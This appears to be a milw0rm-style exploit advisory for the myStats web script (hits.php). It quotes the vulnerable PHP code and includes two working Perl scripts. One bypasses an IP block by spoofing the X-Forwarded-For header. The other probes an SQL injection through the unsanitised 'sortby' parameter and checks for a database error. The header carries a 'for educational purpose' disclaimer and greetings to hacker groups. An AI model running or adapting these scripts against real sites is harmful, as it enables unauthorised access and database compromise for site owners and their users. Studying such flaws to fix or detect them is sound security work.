# myStats (hits.php) Multiple Remote Vulnerabilities Exploit # url: http://mywebland.com/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Greetz To: All Hackers and milw0rm website --------------------- Break System Block IP --------------------- <> 7: if (@getenv("HTTP_X_FORWARDED_FOR")) { $u_ip = @getenv("HTTP_X_FORWARDED_FOR"); } else { $u_ip = @getenv("REMOTE_ADDR"); } if ($u_ip == BLOCK_IP) { return 1; 13: exit; } <> 11: define("BLOCK_IP", "127.0.0.1"); <> use HTTP::Request; use LWP::UserAgent; my $web="http://localhost/hits.php"; my $ua=LWP::UserAgent->new(); $ua->default_header('X-Forwarded-For' => "127.1.1.1"); my $respuesta=HTTP::Request->new(GET=>$web); $ua->timeout(30); my $response=$ua->request($respuesta); $contenido=$response->content; if ($response->is_success) { open(FILE,">>results.txt"); print FILE "$contenido\n"; close(FILE); print "\n[+] Exploit Succesful!\n\n"; } else { print "\n[-] Exploit Failed!\n\n"; } <> $ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP ------------- SQL Injection ------------- <> 63: if (isset($_GET['sortby'])) {$sortby = $_GET['sortby'];} else { $sortby = 'timestamp' ;} $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby." DESC LIMIT 0, ". DISPLAY_LOG_NO ; 69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.
" . mysql_error()); <> use HTTP::Request; use LWP::UserAgent; my $web="http://localhost/hits.php?sortby=1'"; my $ua=LWP::UserAgent->new(); my $respuesta=HTTP::Request->new(GET=>$web); $ua->timeout(30); my $response=$ua->request($respuesta); $contenido=$response->content; if ($response->is_success) { if($contenido =~ /You have an error in your SQL syntax;/) { print "\n[+] Exploit Succesful!\n"; print "\n[+] Content:\n"; print "$contenido\n\n"; } } else { print "\n[-] Exploit Failed!\n\n"; }